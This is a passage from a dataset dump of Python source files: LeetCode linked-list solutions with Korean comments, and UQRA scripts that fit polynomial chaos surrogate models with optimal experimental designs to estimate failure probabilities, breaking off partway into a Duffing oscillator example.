metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jinsim/python-leetcode",
"score": 4
} |
#### File: Linear/LinkedList/17_swap_nods_in_pairs.py
```python
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
# 값만 교환
def swapPairs1(self, head: ListNode) -> ListNode:
cur = head
while cur and cur.next:
cur.val, cur.next.val = cur.next.val, cur.val
cur = cur.next.next
return head
"""다만, 좋지 않은 피드백을 받을 수 있다. 빠르고 쉬운 풀이를 위해서만이다. """
# 반복 구조로 스왑
def swapPairs2(self, head: ListNode) -> ListNode:
root = prev = ListNode(None)
prev.next = head
while head and head.next:
b = head.next
head.next = b.next
b.next = head
prev.next = b
head = head.next
prev = prev.next.next
return root.next
"""그 앞뒤 연결 리스트도 다 수정해야한다. """
# 재귀 구조로 스왑 (훨씬 더 깔끔)
def swapPairs3(self, head: ListNode) -> ListNode:
if head and head.next:
# head의 다음을 가리키는 포인터 설정
p = head.next
# 포인터의 다음으로 재귀 호출, 반환값을 head의 다음으로 잡음.
# 왜냐하면 head는 앞으로 가서 다음 쌍과 연결될 거기 때문.
head.next = self.swapPairs3(p.next)
# 포인터의 다음을 head로 둠. (자리 변경)
p.next = head
# 포인터를 반환. (위치가 변경되었으므로)
return p
return head
```
#### File: Linear/LinkedList/19_reverse_linked_list_2.py
```python
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
# 반복 구조로 노드 뒤집기
def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:
# 예외 처리
if not head or left == right:
return head
root = start = ListNode(None)
root.next = head
# start와 end 설정하기
for _ in range(left - 1):
start = start.next
end = start.next
for _ in range(right-left):
# 임시 변수를 start의 next로 설정 후, 지금 end 다음에 있는 것을 start도 가리키고, end는 end의 다다음에 있는 것을 가리킨다.
# 마지막으로 start의 다음이 가리키는 값을 기존 start 다음에 있는 것으로 설정한다.
tmp, start.next, end.next = start.next, end.next, end.next.next
start.next.next = tmp
return root.next
``` |
{
"source": "Jinsongl/UQRA",
"score": 2
} |
#### File: UQRA/examples/Benchmark_PCE.py
```python
import uqra
import numpy as np, os, sys
import scipy.stats as stats
from tqdm import tqdm
import itertools, copy, math
import multiprocessing as mp
# warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
class Data():
pass
def observation_error(y, mu=0, cov=0.03, random_state=100):
e = stats.norm(0, cov * abs(y)).rvs(size=len(y), random_state=random_state)
return e
def main(s=0):
## ------------------------ Displaying set up ------------------- ###
print('\n#################################################################################')
print(' >>> Start UQRA : {:d}'.format(s), __file__)
print('#################################################################################\n')
np.random.seed(100)
np.set_printoptions(precision=4)
np.set_printoptions(threshold=8)
np.set_printoptions(suppress=True)
pf = np.array([1e-4])
## ------------------------ Define solver ----------------------- ###
# solver = uqra.ExpAbsSum(stats.uniform(-1,2),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.uniform(-1,2),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.uniform(-1,2), d=2)
# solver = uqra.ProductPeak(stats.uniform(-1,2), d=2,c=[-3,2],w=[0.5,0.5])
# solver = uqra.Franke()
# solver = uqra.Ishigami()
# solver = uqra.ExpAbsSum(stats.norm(0,1),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.norm(0,1),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.norm(0,1), d=3, c=np.array([1,2,3]), w=[0.5,]*3)
# solver = uqra.ProductPeak(stats.norm(0,1), d=2, c=[-3,2], w=[0.5,]*2)
# solver = uqra.ExpSum(stats.norm(0,1), d=3)
solver = uqra.FourBranchSystem()
uqra_env = solver.distributions[0]
## ------------------------ UQRA Modeling Parameters ----------------- ###
model_params = uqra.Modeling()
model_params.name = 'PCE'
model_params.degs = np.arange(2,8) #[2,6,10]#
model_params.ndim = solver.ndim
model_params.basis = 'Hem'
model_params.fitting = 'OLS'
model_params.n_splits= 50
model_params.alpha = 2
model_params.num_test= int(1e6)
model_params.num_pred= int(1e7)
model_params.info()
## ------------------------ UQRA DOE Parameters ----------------- ###
doe_params = uqra.ExperimentParameters()
doe_params.doe_sampling = 'CLS4'
doe_params.optimality = ['S']
doe_params.poly_name = model_params.basis
doe_params.num_cand = int(1e5)
# data_dir_cand = '/Users/jinsongliu/BoxSync/Research/Working_Papers/OE2020_LongTermExtreme/Data/FPSO_SURGE/UniformBall'
if doe_params.doe_sampling.lower() == 'lhs':
data_dir_optimal = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/ExperimentalDesign/LHS'
doe_params.update_output_dir(data_dir_optimal=data_dir_optimal)
# with mp.Pool(processes=mp.cpu_count()) as p:
# y0_ecdf= list(tqdm(p.imap(uqra.ECDF, [(uqra.bootstrapping(data_pred.y, 1, bootstrap_size=model_params.num_pred), pf, True) for _ in range(10)]), ncols=80, total=10, desc=' [Boostraping]'))
# print(y0_ecdf)
u_train = np.empty((solver.ndim,0))
x_train = np.empty((solver.ndim,0))
y_train = np.empty((0))
ndim_deg_cases = np.array(list(itertools.product([model_params.ndim,], model_params.degs)))
output_ndim_deg= []
for ndim, deg in ndim_deg_cases:
print(' ----------------------------------------------------------------------------------')
print(' ----------------------------------------------------------------------------------')
## ------------------------ UQRA Surrogate model----------------- ###
orth_poly = uqra.poly.orthogonal(ndim, deg, model_params.basis)
pce_model = uqra.PCE(orth_poly)
pce_model.info()
## ------------------------ Updating DoE parameters ----------------- ###
idoe_params = copy.deepcopy(doe_params)
idoe_params.ndim = ndim
idoe_params.deg = int(deg)
## Specify filename template function
# filename_template= lambda s: r'DoE_Ball5pt6E5R{:d}'.format(s)
# idoe_params.update_filenames(s, filename_template)
## If not specified, default values will be used
idoe_params.update_filenames(s)
### return data dirctories and filenames
filename_cand = idoe_params.fname_cand
data_dir_cand = idoe_params.data_dir_cand
data_dir_optimal= idoe_params.data_dir_optimal
## ------------------------ UQRA Simulation Parameters ----------------- ###
sim_params = uqra.Simulation(solver, pce_model, idoe_params)
sim_params.update_filenames(s)
filename_testin = sim_params.fname_testin
filename_test = sim_params.fname_test
data_dir_test = sim_params.data_dir_test
data_dir_testin = sim_params.data_dir_testin
data_dir_result = sim_params.data_dir_result
figure_dir = sim_params.figure_dir
print(' > {:<25s}'.format('Input/Output Directories:'))
print(' - {:<23s} : {:s}'.format(' Candiate samples' , data_dir_cand))
print(' - {:<23s} : {:s}'.format(' UQRA DoE data ' , data_dir_optimal))
print(' - {:<23s} : {:s}'.format(' Test input ' , data_dir_testin))
print(' - {:<23s} : {:s}'.format(' Test output' , data_dir_test))
print(' - {:<23s} : {:s}'.format(' UQRA output data ' , data_dir_result))
print(' - {:<23s} : {:s}'.format(' UQRA output figure', figure_dir))
print(' > {:<25s}'.format('Input/Output files'))
print(' - {:<23s} : {}'.format(' Cadidate samples' , filename_cand ))
print(' - {:<23s} : {}'.format(' Test input data' , filename_testin))
print(' - {:<23s} : {}'.format(' Test output data' , filename_test ))
if filename_cand:
data_cand = np.load(os.path.join(data_dir_cand, filename_cand))[:ndim, :]
print(' ..{:<30s} shape: {}'.format(' Candidate samples loaded,', data_cand.shape))
### 2. Get test data set
try:
data_test = np.load(os.path.join(data_dir_test, filename_test), allow_pickle=True).tolist()
if isinstance(data_test, uqra.Data):
pass
else:
data_test = data_test[0]
assert isinstance(data_test, (Data, uqra.Data)), 'Type: {}'.format(type(data_test))
except FileNotFoundError:
print(' - Preparing Test data (UQRA.Solver: {:s})... '.format(solver.nickname))
filename_testin = os.path.join(data_dir_cand, filename_testin)
print(' .. Input test data:', filename_testin)
data_test = uqra.Data()
data_test.u = np.load(filename_testin)[:ndim, :model_params.num_test]
if doe_params.doe_sampling.lower() == 'cls4':
data_test.xi = data_test.u* np.sqrt(0.5)
else:
data_test.xi = data_test.u
data_test.x = uqra_env.ppf(stats.norm.cdf(data_test.u))
data_test.y = solver.run(data_test.x)
np.save(os.path.join(data_dir_test, filename_test), data_test, allow_pickle=True)
print(' .. Saving test data to {:s}, shape: x={}, y={} '.format(filename_test,
data_test.x.shape, data_test.y.shape))
print(' ..{:<30s} shape: {} '.format(' Test data loaded,', data_test.y.shape))
## ECDF, quantile values based on test data
data_pred = np.load(os.path.join(data_dir_test, '{:s}_CDF_McsE6R{:d}.npy'.format(solver.nickname, s)), allow_pickle=True).tolist()
data_pred_ecdf = np.load(os.path.join(data_dir_test, '{:s}_McsE7_Ecdf.npy'.format(solver.nickname)), allow_pickle=True).tolist()
output_indim_ideg = uqra.Data()
if idoe_params.doe_sampling.lower() == 'lhs':
all_doe_cases = [(idoe_params.doe_sampling, None)]
else:
all_doe_cases = [(idoe_params.doe_sampling, ioptimality) for ioptimality in idoe_params.optimality]
for idoe_sampling, ioptimality in all_doe_cases:
idoe_sampling = idoe_sampling.lower()
idoe_nickname = idoe_params.doe_nickname(idoe_sampling, ioptimality)
n_samples = model_params.alpha * pce_model.num_basis
print(' --------------------------------------------------------------------------------')
print(' >> UQRA Training with Experimental Design {} '.format(idoe_nickname))
print(' -> Training with (n={:d}, alpha={:.2f}) samples'.format(n_samples, model_params.alpha))
if idoe_sampling.lower() == 'lhs':
filename_design = idoe_params.fname_design(n_samples)
else:
filename_design = idoe_params.fname_design
print(' - {:<23s} : {}'.format(' UQRA DoE filename' , filename_design))
data_design = np.load(os.path.join(data_dir_optimal, filename_design), allow_pickle=True).tolist()
print(' ..{:<23s} : {}'.format(' # optimal sample sets,', len(data_design)))
### if data_deisgn has more than one set of optimal samples, choose the first one
if isinstance(data_design, list):
data_design = data_design[0]
if idoe_sampling.lower() == 'lhs':
data_design = np.array(data_design)
assert data_design.shape == (ndim, n_samples)
u_train_ = data_design
else:
assert isinstance(data_design, (Data, uqra.Data)),'TypeError: expected uqra.Data, but {} given'.format(type(data_design))
assert data_design.deg == deg and data_design.ndim == model_params.ndim
optimal_samples_idx = getattr(data_design, idoe_nickname)
if len(optimal_samples_idx) < n_samples:
raise ValueError(' Requesting {:d} samples but only {:d} available...'.format(
n_samples, len(optimal_samples_idx)))
u_train_ = data_cand[:model_params.ndim, optimal_samples_idx[:n_samples]]
if idoe_sampling.lower()=='cls4':
u_train_ = u_train_ * deg **0.5
x_train_ = uqra_env.ppf(pce_model.orth_poly.dist_u.cdf(u_train_))
y_train_ = solver.run(x_train_)
# y_train = y_train + observation_error(y_train)
### 3. train model
# u_train = np.concatenate((u_train, u_train_), axis=-1)
# x_train = np.concatenate((x_train, x_train_), axis=-1)
# y_train = np.concatenate((y_train, y_train_), axis=-1)
u_train = u_train_
x_train = x_train_
y_train = y_train_
U_train = pce_model.orth_poly.vandermonde(u_train)
print(' Train Data U: {}'.format(u_train.shape))
print(' Train Data X: {}'.format(x_train.shape))
print(' Train Data y: {}'.format(y_train.shape))
# X_train = orth_poly.vandermonde(x_train)
if idoe_sampling.lower().startswith('cls'):
### reproducing kernel
WU_train = pce_model.orth_poly.num_basis**0.5*(U_train.T / np.linalg.norm(U_train, axis=1)).T
w = pce_model.christoffel_weight(u_train, active=None)
else:
WU_train = U_train
w = None
## condition number, kappa = max(svd)/min(svd)
_, sigular_values, _ = np.linalg.svd(WU_train)
if idoe_sampling.lower().startswith('cls'):
u_test = data_test.xi
u_pred = data_pred.xi[:,:model_params.num_pred]
elif idoe_sampling.lower().startswith('mcs'):
u_test = data_test.u
u_pred = data_pred.u[:,:model_params.num_pred]
elif idoe_sampling.lower() == 'lhs':
u_test = data_test.u
u_pred = data_pred.u[:,:model_params.num_pred]
# pce_model.fit_lassolars(u_train, y_train, w=w)
data = uqra.Data()
data.kappa = max(abs(sigular_values)) / min(abs(sigular_values))
pce_model.fit(model_params.fitting, u_train, y_train, w=w, n_jobs=4)
y_test = pce_model.predict(u_test, n_jobs=4)
y_pred = pce_model.predict(u_pred, n_jobs=4)
data.rmse_y = uqra.metrics.mean_squared_error(data_test.y, y_test, squared=False)
data.model = pce_model
data.y0_hat = uqra.metrics.mquantiles(y_pred, prob=1-pf)
print(uqra.metrics.mquantiles(y_test, prob=1-pf))
print(uqra.metrics.mquantiles(y_pred, prob=1-pf))
print(uqra.metrics.mquantiles(solver.run(data_pred.x), prob=1-pf))
data.ypred_ecdf = uqra.ECDF(y_pred, alpha=pf, compress=True)
# data.y0_ecdf=y0_ecdf
data.score = pce_model.score
data.cv_error = pce_model.cv_error
print(pce_model.coef)
tqdm.write(' > Summary')
with np.printoptions(precision=4):
# tqdm.write(' - {:<15s} : {}'.format( 'QoI' , QoI))
tqdm.write(' - {:<15s} : {}'.format( 'RMSE y ' , data.rmse_y))
tqdm.write(' - {:<15s} : {}'.format( 'CV MSE' , data.cv_error))
tqdm.write(' - {:<15s} : {}'.format( 'Score ' , data.score))
tqdm.write(' - {:<15s} : {}'.format( 'kappa ' , data.kappa))
tqdm.write(' - {:<15s} : {} [{}]'.format( 'y0 ' , data.y0_hat, data_pred_ecdf.y0[s]))
setattr(output_indim_ideg, idoe_nickname, data)
output_ndim_deg.append(output_indim_ideg)
## ============ Saving QoIs ============
filename = '{:s}_{:s}_{:s}E5R{:d}'.format(solver.nickname, pce_model.tag, doe_params.doe_sampling.capitalize(), s)
try:
np.save(os.path.join(data_dir_result, filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(data_dir_result, filename)))
except:
np.save(os.path.join(os.getcwd(), filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(os.getcwd(), filename)))
if __name__ == '__main__':
main(0)
```
#### File: UQRA/examples/CompositeGaussian_AdapSPCE.py
```python
import uqra
import numpy as np, os, sys
import scipy.stats as stats
from tqdm import tqdm
import itertools, copy, math, collections
import multiprocessing as mp
# warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
class Data():
pass
def observation_error(y, mu=0, cov=0.03, random_state=100):
e = stats.norm(0, cov * abs(y)).rvs(size=len(y), random_state=random_state)
return e
def run_UQRA_OptimalDesign(x, poly, doe_sampling, optimality, n_samples, optimal_samples=[], active_index=None):
optimal_samples = 'RRQR' if len(optimal_samples) == 0 else copy.deepcopy(optimal_samples)
x = poly.deg**0.5 * x if doe_sampling.lower() in ['cls4', 'cls5'] else x
if doe_sampling.lower().startswith('cls'):
X = poly.vandermonde(x)
X = poly.num_basis**0.5*(X.T / np.linalg.norm(X, axis=1)).T
else:
X = poly.vandermonde(x)
if active_index is None:
X = X
else:
X = X[:, active_index]
uqra.blockPrint()
doe = uqra.OptimalDesign(X)
idx = doe.samples(optimality, n_samples, initialization=optimal_samples) ## additional n_samples new samples
uqra.enablePrint()
if isinstance(optimal_samples, (list, tuple)):
idx = [i for i in idx if i not in optimal_samples]
assert len(idx) == n_samples
return idx
def isOverfitting(cv_err):
if len(cv_err) < 3 :
return False
if cv_err[-1] > cv_err[-2] and cv_err[-2] > cv_err[0]:
print('WARNING: Overfitting')
return False
def isConverge(pf, abs_tol=1e-4):
if len(pf) < 2:
return False
if abs(pf[-2]-pf[-1]) > abs_tol:
return False
else:
return True
def check_converge(pf, abs_tol=1e-4):
"""
Return Y/N, converged pf/ raw pf, relative changes
"""
is_converge = isConverge(pf, abs_tol)
if len(pf) >= 2:
abs_err = abs(pf[-2]-pf[-1])
else:
abs_err = None
if is_converge:
res = (True, pf[-1], abs_err)
else:
res = (False, pf , abs_err)
return res
# def isConverge(y0, pf, e=0.025, abs_tol=1e-4):
# if len(y0) < 2 or len(pf) < 2:
# return False
# if abs(y0[-2]-y0[-1])/abs(y0[-2]) > e:
# return False
# elif abs(pf[-2]-pf[-1]) > abs_tol:
# return False
# else:
# return True
# def check_converge(y0, e=0.025):
# """
# Return Y/N, converged y0/ raw y0, relative changes
# """
# is_converge = isConverge(y0, e)
# if len(y0) >= 2:
# rel_change = abs(y0[-2]-y0[-1])/abs(y0[-2])
# else:
# rel_change = None
# if is_converge:
# res = (True, y0[-1], rel_change)
# else:
# res = (False,y0 , rel_change)
# return res
def main(r=0):
## ------------------------ Displaying set up ------------------- ###
print('\n#################################################################################')
print(' >>> Start UQRA : {:d}'.format(r), __file__)
print('#################################################################################\n')
np.random.seed(100)
np.set_printoptions(precision=4)
np.set_printoptions(threshold=1000)
np.set_printoptions(suppress=True)
pf = np.array([1.26e-4])
n_jobs = mp.cpu_count()
## ------------------------ Define solver ----------------------- ###
# solver = uqra.ExpAbsSum(stats.uniform(-1,2),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.uniform(-1,2),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.uniform(-1,2), d=2)
# solver = uqra.ProductPeak(stats.uniform(-1,2), d=2,c=[-3,2],w=[0.5,0.5])
# solver = uqra.Franke()
# solver = uqra.Ishigami()
# solver = uqra.ExpAbsSum(stats.norm(0,1),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.norm(0,1),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.norm(0,1), d=3, c=np.array([1,2,3]), w=[0.5,]*3)
# solver = uqra.ProductPeak(stats.norm(0,1), d=2, c=[-3,2], w=[0.5,]*2)
# solver = uqra.ExpSum(stats.norm(0,1), d=3)
# solver = uqra.FourBranchSystem()
solver = uqra.CompositeGaussian()
## ------------------------ UQRA Modeling Parameters ----------------- ###
model_params = uqra.Modeling()
model_params.name = 'PCE'
model_params.degs = np.arange(1,15) #[2,6,10]#
model_params.ndim = solver.ndim
model_params.basis = 'Hem'
model_params.fitting = 'OLSLAR'
model_params.n_splits= 50
model_params.alpha = 2
model_params.num_test= int(1e7)
model_params.num_pred= int(1e7)
model_params.info()
## ------------------------ UQRA DOE Parameters ----------------- ###
doe_params = uqra.ExperimentParameters()
doe_params.doe_sampling = 'CLS4'
doe_params.optimality = ['S']
doe_params.poly_name = model_params.basis
doe_params.num_cand = int(1e5)
# data_dir_cand = '/Users/jinsongliu/BoxSync/Research/Working_Papers/OE2020_LongTermExtreme/Data/FPSO_SURGE/UniformBall'
if doe_params.doe_sampling.lower() == 'lhs':
data_dir_optimal = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/ExperimentalDesign/LHS'
doe_params.update_output_dir(data_dir_optimal=data_dir_optimal)
optimal_samples = []
ndim_deg_cases = np.array(list(itertools.product([model_params.ndim,], model_params.degs)))
output_ndim_deg = []
deg_stop_cv_err = []
# deg_stop_y0_hat = []
deg_stop_pf_hat = []
for ndim, deg in ndim_deg_cases:
print(' ==================================================================================')
print(' ==================================================================================')
## ------------------------ UQRA Surrogate model----------------- ###
orth_poly = uqra.poly.orthogonal(ndim, deg, model_params.basis)
pce_model = uqra.PCE(orth_poly)
if orth_poly.dist_name.lower() == 'norm':
dist_u = stats.norm()
elif orth_poly.dist_name.lower() == 'uniform':
dist_u = stats.uniform(-1,2)
else:
raise ValueError(' {} not defined'.format(orth_poly.dist_name))
dist_xi = orth_poly.dist_u
dist_x = solver.distributions
pce_model.info()
## ------------------------ Updating DoE parameters ----------------- ###
idoe_params = copy.deepcopy(doe_params)
idoe_params.ndim = ndim
idoe_params.deg = int(deg)
## Specify filename template function
# idoe_params.update_filenames(r, filename_template)
## If not specified, default values will be used
idoe_params.update_filenames(r)
### return data dirctories and filenames
filename_cand = idoe_params.fname_cand
data_dir_cand = idoe_params.data_dir_cand
data_dir_optimal= idoe_params.data_dir_optimal
## ------------------------ UQRA Simulation Parameters ----------------- ###
sim_params = uqra.Simulation(solver, pce_model, idoe_params)
filename_test = lambda r: r'McsE7R{:d}'.format(r)
sim_params.update_filenames(r, filename_test)
filename_testin = sim_params.fname_testin
filename_test = sim_params.fname_test
data_dir_result = sim_params.data_dir_result
figure_dir = sim_params.figure_dir
data_dir_test = sim_params.data_dir_test
data_dir_testin = sim_params.data_dir_testin
print(' > {:<25s}'.format('Input/Output Directories:'))
print(' - {:<23s} : {:s}'.format(' Candiate samples' , data_dir_cand))
print(' - {:<23s} : {:s}'.format(' UQRA DoE data ' , data_dir_optimal))
print(' - {:<23s} : {:s}'.format(' Test input ' , data_dir_testin))
print(' - {:<23s} : {:s}'.format(' Test output' , data_dir_test))
print(' - {:<23s} : {:s}'.format(' UQRA output data ' , data_dir_result))
print(' - {:<23s} : {:s}'.format(' UQRA output figure', figure_dir))
print(' > {:<25s}'.format('Input/Output files'))
print(' - {:<23s} : {}'.format(' Cadidate samples' , filename_cand ))
print(' - {:<23s} : {}'.format(' Test input data' , filename_testin))
print(' - {:<23s} : {}'.format(' Test output data' , filename_test ))
if filename_cand:
data_cand = np.load(os.path.join(data_dir_cand, filename_cand))[:ndim, :idoe_params.num_cand]
print(' ..{:<23s} : {}'.format(' Candidate samples', data_cand.shape))
### 2. Get test data set
data_test = np.load(os.path.join(data_dir_test, filename_test), allow_pickle=True).tolist()
print(data_test.__dict__.keys())
data_test.x = solver.map_domain(data_test.u, dist_u)
data_test.xi= data_test.u*0.5**0.5
data_test.y = solver.run(data_test.x)
u_test = data_test.xi[:, :model_params.num_test]
y_test = data_test.y
output_indim_ideg = uqra.Data()
if idoe_params.doe_sampling.lower() == 'lhs':
all_doe_cases = [(idoe_params.doe_sampling, None)]
else:
all_doe_cases = [(idoe_params.doe_sampling, ioptimality) for ioptimality in idoe_params.optimality]
for idoe_sampling, ioptimality in all_doe_cases:
idoe_sampling = idoe_sampling.lower()
idoe_nickname = idoe_params.doe_nickname(idoe_sampling, ioptimality)
print(' --------------------------------------------------------------------------------')
print(' >> UQRA Training with Experimental Design {} '.format(idoe_nickname))
### temp data object containing results from intermedia steps
data_temp= uqra.Data()
# data_temp.y0_hat = []
data_temp.pf_hat = []
data_temp.cv_err = []
data_temp.kappa = []
data_temp.rmse_y = []
data_temp.model = []
data_temp.score = []
data_temp.ypred_ecdf=[]
optimal_samples_ideg=[]
print(' 1. Optimal samples based on FULL basis')
n_samples = 5*(deg == model_params.degs[0])+orth_poly.num_basis
print(' - {:s}: adding {:d} optimal samples'.format(idoe_nickname, n_samples))
idx = run_UQRA_OptimalDesign(data_cand, orth_poly, idoe_sampling, ioptimality, n_samples)
optimal_samples_ideg = optimal_samples_ideg + idx
optimal_samples = optimal_samples + idx
assert n_samples == len(idx)
print(' - # optimal samples [p={:d}]: {:d}'.format(deg, len(optimal_samples_ideg)))
print(' - Total number of optimal samples: {:d}'.format(len(optimal_samples)))
print(' - {:s} with (n={:d}, alpha={:.2f}) samples'.format(model_params.fitting.upper(),
len(optimal_samples), len(optimal_samples)/orth_poly.num_basis))
u_train = data_cand[:, optimal_samples]
if idoe_sampling.lower()=='cls4':
u_train = u_train * deg **0.5
x_train = solver.map_domain(u_train, dist_xi)
y_train = solver.run(x_train)
# y_train = y_train + observation_error(y_train)
## condition number, kappa = max(svd)/min(svd)
pce_model.fit(model_params.fitting, u_train, y_train, w=idoe_sampling, n_jobs=n_jobs)
y_test_hat = pce_model.predict(u_test, n_jobs=n_jobs)
data_temp.rmse_y.append(uqra.metrics.mean_squared_error(y_test, y_test_hat, squared=False))
data_temp.model.append(pce_model)
data_temp.pf_hat.append(np.sum(y_test_hat<0)/len(y_test_hat))
print(' pf test [PCE] : {:.4e}/{:d}'.format(np.sum(y_test_hat<0)/len(y_test_hat), len(y_test_hat)))
# print(' y0 pred [TRUE] : {:.4f}'.format(uqra.metrics.mquantiles(solver.run(data_pred.x), prob=1-pf)))
# data_temp.ypred_ecdf.append(uqra.ECDF(y_test_hat, alpha=pf, compress=True))
# data.y0_ecdf=y0_ecdf
data_temp.score.append(pce_model.score)
data_temp.cv_err.append(pce_model.cv_error)
is_converge, pf_hat, pf_hat_err = check_converge(data_temp.pf_hat, abs_tol=1e-4)
active_basis = pce_model.active_basis
active_index = pce_model.active_index
print(' - # Active basis: {:d}'.format(len(active_index)))
print(' > pf: {}, pf abs_err: {}'.format(np.array(data_temp.pf_hat), pf_hat_err))
print(' 2. Optimal samples based on SIGNIFICANT basis')
while True:
### increase number of samples by n_new
n_samples = len(active_index)
print(' - {:s}: Sparsity: {:d}, adding {:d} optimal samples'.format(
idoe_nickname,len(active_index),n_samples))
idx = run_UQRA_OptimalDesign(data_cand, orth_poly, idoe_sampling, ioptimality, n_samples,
optimal_samples=optimal_samples_ideg, active_index=active_index)
optimal_samples = optimal_samples + idx
optimal_samples_ideg = optimal_samples_ideg + idx
assert n_samples == len(idx)
print(' - # optimal samples [p={:d}]: {:d}'.format(deg, len(optimal_samples_ideg)))
print(' - Total number of optimal samples: {:d}'.format(len(optimal_samples)))
print(' - {:s} with (n={:d}, alpha={:.2f}) samples'.format(model_params.fitting.upper(),
len(optimal_samples), len(optimal_samples)/orth_poly.num_basis))
u_train = data_cand[:, optimal_samples]
if idoe_sampling.lower()=='cls4':
u_train = u_train * deg **0.5
x_train = solver.map_domain(u_train, dist_xi)
y_train = solver.run(x_train)
# y_train = y_train + observation_error(y_train)
# w = pce_model.christoffel_weight(u_train, active=active_index) if idoe_sampling.lower().startswith('cls') else None
pce_model.fit(model_params.fitting, u_train, y_train, w=idoe_sampling, n_jobs=n_jobs)
y_test_hat = pce_model.predict(u_test, n_jobs=n_jobs)
data_temp.rmse_y.append(uqra.metrics.mean_squared_error(y_test, y_test_hat, squared=False))
data_temp.model.append(pce_model)
data_temp.pf_hat.append(np.sum(y_test_hat<0)/len(y_test_hat))
print(' pf test [PCE] : {:.4e}/{:d}'.format(np.sum(y_test_hat<0)/len(y_test_hat), len(y_test_hat)))
# print(' y0 pred [TRUE] : {:.4f}'.format(uqra.metrics.mquantiles(solver.run(data_pred.x), prob=1-pf)))
# data_temp.ypred_ecdf.append(uqra.ECDF(y_test_hat, alpha=pf, compress=True))
# data.y0_ecdf=y0_ecdf
data_temp.score.append(pce_model.score)
data_temp.cv_err.append(pce_model.cv_error)
active_index = pce_model.active_index
active_basis = pce_model.active_basis
isOverfitting(data_temp.cv_err) ## check Overfitting
is_converge, pf_hat, pf_hat_err = check_converge(data_temp.pf_hat, abs_tol=1e-4)
print(' - # Active basis: {:d}'.format(len(active_index)))
print(' > pf: {}, pf abs_err: {}'.format(np.array(data_temp.pf_hat), pf_hat_err))
# print(' ==================================================' )
if is_converge:
print(' !<>! Model converge for order {:d}'.format(deg))
# print(' ==================================================' )
break
if len(optimal_samples_ideg)>=2*orth_poly.num_basis:
print(' !<>! Number of samples exceeding 2P')
# print(' ==================================================' )
break
deg_stop_cv_err.append(data_temp.cv_err[-1])
deg_stop_pf_hat.append(data_temp.pf_hat[-1])
data = uqra.Data()
data.ndim = ndim
data.deg = deg
data.u_train= u_train
data.x_train= x_train
data.y_train= y_train
data.rmse_y = data_temp.rmse_y[-1]
data.pf_hat = data_temp.pf_hat[-1]
# data.y0_hat_x = uqra_env.ppf(pce_model.orth_poly.dist_u.cdf(data.y0_hat_u.reshape(solver.ndim, -1)))
data.cv_err = data_temp.cv_err[-1]
data.model = data_temp.model[-1]
data.score = data_temp.score[-1]
# data.ypred_ecdf = data_temp.ypred_ecdf[-1]
print(' ------------------------------')
tqdm.write(' > Summary PCE: ndim={:d}, p={:d}'.format(ndim, deg))
# tqdm.write(' - {:<15s} : {}'.format( 'QoI' , QoI))
tqdm.write(' - {:<15s} : {}'.format( 'RMSE y ' , np.array(data.rmse_y)))
tqdm.write(' - {:<15s} : {}'.format( 'CV MSE' , np.array(data.cv_err)))
tqdm.write(' - {:<15s} : {}'.format( 'Score ' , np.array(data.score)))
# tqdm.write(' - {:<15s} : {}'.format( 'kappa ' , data.kappa))
tqdm.write(' - {:<15s} : {} [{}]'.format( 'pf ' , np.array(data.pf_hat), data_test.pf))
print(uqra.metrics.mquantiles(y_test_hat, 1-pf))
setattr(output_indim_ideg, idoe_nickname, data)
output_ndim_deg.append(output_indim_ideg)
isOverfitting(deg_stop_cv_err) ## check Overfitting
is_converge, pf_hat, pf_hat_err = check_converge(deg_stop_pf_hat, abs_tol=1e-4)
print(' > pf: {}, pf abs_err: {}'.format(np.array(deg_stop_pf_hat), pf_hat_err))
if is_converge:
print('Simulation Done')
print(' ------------------------------')
break
## ============ Saving QoIs ============
filename = '{:s}_Adap{:s}_{:s}E5R{:d}'.format(solver.nickname, pce_model.tag, doe_params.doe_sampling.capitalize(), r)
try:
np.save(os.path.join(data_dir_result, filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(data_dir_result, filename)))
except:
np.save(os.path.join(os.getcwd(), filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(os.getcwd(), filename)))
if __name__ == '__main__':
main(0)
```
#### File: examples/duffing/duffing.py
```python
import context
import chaospy as cp
import numpy as np
import scipy.signal as spsignal
import envi, doe, solver, utilities
from envi import environment
from metaModel import metaModel
from simParams import simParameter
from run_sim import run_sim
from solver.dynamic_models import lin_oscillator
from solver.dynamic_models import duffing_oscillator
from solver.static_models import ishigami
from solver.static_models import poly5
from utilities.gen_gauss_time_series import gen_gauss_time_series
import uqplot.plot_solver as psolver
import matplotlib.pyplot as plt
from statsmodels.distributions.empirical_distribution import ECDF
import matplotlib.cm as cm
from mpl_toolkits.mplot3d import Axes3D
import time
def main():
## Duffing oscillator problem
## Ref: Dr. <NAME>
## -- source function S(w) = c/(c^2 + w^2), with c ~ LogNormal()
## --
## Exceedence probability
pf = 1e-4
## ------------------------------------------------------------------- ###
## Define Solver parameters ###
## ------------------------------------------------------------------- ###
## Choose Wiener-Askey scheme random varaible
dist_zeta = cp.Gamma() # shape=1, scale=1, shift=0
## If transformation needed, like Rosenblatt, need to be done here
## Define independent random varible in physical problems
